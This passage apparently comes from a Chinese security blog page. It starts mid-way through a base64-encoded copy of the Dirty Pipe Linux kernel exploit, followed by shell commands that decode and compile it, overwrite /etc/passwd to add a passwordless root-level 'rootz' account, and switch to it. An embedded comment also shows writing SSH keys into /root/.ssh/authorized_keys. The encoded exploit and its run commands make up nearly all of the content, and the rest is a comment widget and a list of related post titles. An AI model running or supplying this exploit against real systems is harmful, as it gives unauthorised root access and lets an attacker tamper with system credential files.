gY2Fubm90CiAqIGNyb3NzIGEgcGFnZSBib3VuZGFyeS4KICoKICogRXhhbXBsZTogLi93cml0ZV9hbnl0aGluZyAvcm9vdC8uc3NoL2F1dGhvcml6ZWRfa2V5cyAxICQnXG5zc2gtZWQyNTUxOSBBQUEuLi4uLi5cbicKICoKICogRnVydGhlciBleHBsYW5hdGlvbjogaHR0cHM6Ly9kaXJ0eXBpcGUuY200YWxsLmNvbS8KICovCgojZGVmaW5lIF9HTlVfU09VUkNFCiNpbmNsdWRlIDx1bmlzdGQuaD4KI2luY2x1ZGUgPGZjbnRsLmg+CiNpbmNsdWRlIDxzdGRpby5oPgojaW5jbHVkZSA8c3RkbGliLmg+CiNpbmNsdWRlIDxzdHJpbmcuaD4KI2luY2x1ZGUgPHN5cy9zdGF0Lmg+CiNpbmNsdWRlIDxzeXMvdXNlci5oPgoKI2lmbmRlZiBQQUdFX1NJWkUKI2RlZmluZSBQQUdFX1NJWkUgNDA5NgojZW5kaWYKCi8qKgogKiBDcmVhdGUgYSBwaXBlIHdoZXJlIGFsbCAiYnVmcyIgb24gdGhlIHBpcGVfaW5vZGVfaW5mbyByaW5nIGhhdmUgdGhlCiAqIFBJUEVfQlVGX0ZMQUdfQ0FOX01FUkdFIGZsYWcgc2V0LgogKi8Kc3RhdGljIHZvaWQgcHJlcGFyZV9waXBlKGludCBwWzJdKQp7CglpZiAocGlwZShwKSkgYWJvcnQoKTsKCgljb25zdCB1bnNpZ25lZCBwaXBlX3NpemUgPSBmY250bChwWzFdLCBGX0dFVFBJUEVfU1opOwoJc3RhdGljIGNoYXIgYnVmZmVyWzQwOTZdOwoKCS8qIGZpbGwgdGhlIHBpcGUgY29tcGxldGVseTsgZWFjaCBwaXBlX2J1ZmZlciB3aWxsIG5vdyBoYXZlCgkgICB0aGUgUElQRV9CVUZfRkxBR19DQU5fTUVSR0UgZmxhZyAqLwoJZm9yICh1bnNpZ25lZCByID0gcGlwZV9zaXplOyByID4gMDspIHsKCQl1bnNpZ25lZCBuID0gciA+IHNpemVvZihidWZmZXIpID8gc2l6ZW9mKGJ1ZmZlcikgOiByOwoJCXdyaXRlKHBbMV0sIGJ1ZmZlciwgbik7CgkJciAtPSBuOwoJfQoKCS8qIGRyYWluIHRoZSBwaXBlLCBmcmVlaW5nIGFsbCBwaXBlX2J1ZmZlciBpbnN0YW5jZXMgKGJ1dAoJICAgbGVhdmluZyB0aGUgZmxhZ3MgaW5pdGlhbGl6ZWQpICovCglmb3IgKHVuc2lnbmVkIHIgPSBwaXBlX3NpemU7IHIgPiAwOykgewoJCXVuc2lnbmVkIG4gPSByID4gc2l6ZW9mKGJ1ZmZlcikgPyBzaXplb2YoYnVmZmVyKSA6IHI7CgkJcmVhZChwWzBdLCBidWZmZXIsIG4pOwoJCXIgLT0gbjsKCX0KCgkvKiB0aGUgcGlwZSBpcyBub3cgZW1wdHksIGFuZCBpZiBzb21lYm9keSBhZGRzIGEgbmV3CgkgICBwaXBlX2J1ZmZlciB3aXRob3V0IGluaXRpYWxpemluZyBpdHMgImZsYWdzIiwgdGhlIGJ1ZmZlcgoJICAgd2lsbCBiZSBtZXJnZWFibGUgKi8KfQ==|base64 -d >exp.c

echo aW50IG1haW4oaW50IGFyZ2MsIGNoYXIgKiphcmd2KQp7CglpZiAoYXJnYyAhPSA0KSB7CgkJZnByaW50ZihzdGRlcnIsICJVc2FnZTogJXMgVEFSR0VURklMRSBPRkZTRVQgREFUQVxuIiwgYXJndlswXSk7CgkJcmV0dXJuIEVYSVRfRkFJTFVSRTsKCX0KCgkvKiBkdW1iIGNvbW1hbmQtbGluZSBhcmd1bWVudCBwYXJzZXIgKi8KCWNvbnN0IGNoYXIgKmNvbnN0IHBhdGggPSBhcmd2WzFdOwoJbG9mZl90IG9mZnNldCA9IHN0cnRvdWwoYXJndlsyXSwgTlVMTCwgMCk7Cgljb25zdCBjaGFyICpjb25zdCBkYXRhID0gYXJndlszXTsKCWNvbnN0IHNpemVfdCBkYXRhX3NpemUgPSBzdHJsZW4oZGF0YSk7CgoJaWYgKG9mZnNldCAlIFBBR0VfU0laRSA9PSAwKSB7CgkJZnByaW50ZihzdGRlcnIsICJTb3JyeSwgY2Fubm90IHN0YXJ0IHdyaXRpbmcgYXQgYSBwYWdlIGJvdW5kYXJ5XG4iKTsKCQlyZXR1cm4gRVhJVF9GQUlMVVJFOwoJfQoKCWNvbnN0IGxvZmZfdCBuZXh0X3BhZ2UgPSAob2Zmc2V0IHwgKFBBR0VfU0laRSAtIDEpKSArIDE7Cgljb25zdCBsb2ZmX3QgZW5kX29mZnNldCA9IG9mZnNldCArIChsb2ZmX3QpZGF0YV9zaXplOwoJaWYgKGVuZF9vZmZzZXQgPiBuZXh0X3BhZ2UpIHsKCQlmcHJpbnRmKHN0ZGVyciwgIlNvcnJ5LCBjYW5ub3Qgd3JpdGUgYWNyb3NzIGEgcGFnZSBib3VuZGFyeVxuIik7CgkJcmV0dXJuIEVYSVRfRkFJTFVSRTsKCX0KCgkvKiBvcGVuIHRoZSBpbnB1dCBmaWxlIGFuZCB2YWxpZGF0ZSB0aGUgc3BlY2lmaWVkIG9mZnNldCAqLwoJY29uc3QgaW50IGZkID0gb3BlbihwYXRoLCBPX1JET05MWSk7IC8vIHllcywgcmVhZC1vbmx5ISA6LSkKCWlmIChmZCA8IDApIHsKCQlwZXJyb3IoIm9wZW4gZmFpbGVkIik7CgkJcmV0dXJuIEVYSVRfRkFJTFVSRTsKCX0KCglzdHJ1Y3Qgc3RhdCBzdDsKCWlmIChmc3RhdChmZCwgJnN0KSkgewoJCXBlcnJvcigic3RhdCBmYWlsZWQiKTsKCQlyZXR1cm4gRVhJVF9GQUlMVVJFOwoJfQoKCWlmIChvZmZzZXQgPiBzdC5zdF9zaXplKSB7CgkJZnByaW50ZihzdGRlcnIsICJPZmZzZXQgaXMgbm90IGluc2lkZSB0aGUgZmlsZVxuIik7CgkJcmV0dXJuIEVYSVRfRkFJTFVSRTsKCX0KCglpZiAoZW5kX29mZnNldCA+IHN0LnN0X3NpemUpIHsKCQlmcHJpbnRmKHN0ZGVyciwgIlNvcnJ5LCBjYW5ub3QgZW5sYXJnZSB0aGUgZmlsZVxuIik7CgkJcmV0dXJuIEVYSVRfRkFJTFVSRTsKCX0KCgkvKiBjcmVhdGUgdGhlIHBpcGUgd2l0aCBhbGwgZmxhZ3MgaW5pdGlhbGl6ZWQgd2l0aAoJICAgUElQRV9CVUZfRkxBR19DQU5fTUVSR0UgKi8KCWludCBwWzJdOwoJcHJlcGFyZV9waXBlKHApOwoKCS8qIHNwbGljZSBvbmUgYnl0ZSBmcm9tIGJlZm9yZSB0aGUgc3BlY2lmaWVkIG9mZnNldCBpbnRvIHRoZQoJICAgcGlwZTsgdGhpcyB3aWxsIGFkZCBhIHJlZmVyZW5jZSB0byB0aGUgcGFnZSBjYWNoZSwgYnV0CgkgICBzaW5jZSBjb3B5X3BhZ2VfdG9faXRlcl9waXBlKCkgZG9lcyBub3QgaW5pdGlhbGl6ZSB0aGUKCSAgICJmbGFncyIsIFBJUEVfQlVGX0ZMQUdfQ0FOX01FUkdFIGlzIHN0aWxsIHNldCAqLwoJLS1vZmZzZXQ7Cglzc2l6ZV90IG5ieXRlcyA9IHNwbGljZShmZCwgJm9mZnNldCwgcFsxXSwgTlVMTCwgMSwgMCk7CglpZiAobmJ5dGVzIDwgMCkgewoJCXBlcnJvcigic3BsaWNlIGZhaWxlZCIpOwoJCXJldHVybiBFWElUX0ZBSUxVUkU7Cgl9CglpZiAobmJ5dGVzID09IDApIHsKCQlmcHJpbnRmKHN0ZGVyciwgInNob3J0IHNwbGljZVxuIik7CgkJcmV0dXJuIEVYSVRfRkFJTFVSRTsKCX0KCgkvKiB0aGUgZm9sbG93aW5nIHdyaXRlIHdpbGwgbm90IGNyZWF0ZSBhIG5ldyBwaXBlX2J1ZmZlciwgYnV0CgkgICB3aWxsIGluc3RlYWQgd3JpdGUgaW50byB0aGUgcGFnZSBjYWNoZSwgYmVjYXVzZSBvZiB0aGUKCSAgIFBJUEVfQlVGX0ZMQUdfQ0FOX01FUkdFIGZsYWcgKi8KCW5ieXRlcyA9IHdyaXRlKHBbMV0sIGRhdGEsIGRhdGFfc2l6ZSk7CglpZiAobmJ5dGVzIDwgMCkgewoJCXBlcnJvcigid3JpdGUgZmFpbGVkIik7CgkJcmV0dXJuIEVYSVRfRkFJTFVSRTsKCX0KCWlmICgoc2l6ZV90KW5ieXRlcyA8IGRhdGFfc2l6ZSkgewoJCWZwcmludGYoc3RkZXJyLCAic2hvcnQgd3JpdGVcbiIpOwoJCXJldHVybiBFWElUX0ZBSUxVUkU7Cgl9CgoJcHJpbnRmKCJJdCB3b3JrZWQhXG4iKTsKCXJldHVybiBFWElUX1NVQ0NFU1M7Cn0=|base64 -d >> exp.c

cp /etc/passwd /tmp/passwd.bak
gcc exp.c -o exp
./exp /etc/passwd 1 ootz:
su rootz
id
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

																

							
							
						

															
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇 

                    

                    
			        推荐文章
		            

		            

							
生活の杂言记

							
							

							
从一道题认识jdbc任意读文件和RMIConnector触发二次反序列化 — 2022强网拟态NoRCE

							
							

							
古典密码体制|密码学

							
							

							
CC的回顾|Java常用链复盘(一)

							
							

							
密码保护:关于学习最近不在状态的反思&本学期的学习规划

							
							

							
PHP短标签的生效规则|知识小记

							
							

							
golang模板渲染可控的条件下可以做什么?

							
							

							
BeanShell1反序列化|ysoserial学习(五)

							
							

							
Hibernate2反序列化|ysoserial学习(三)

							
							

							
蓝帽杯半决wp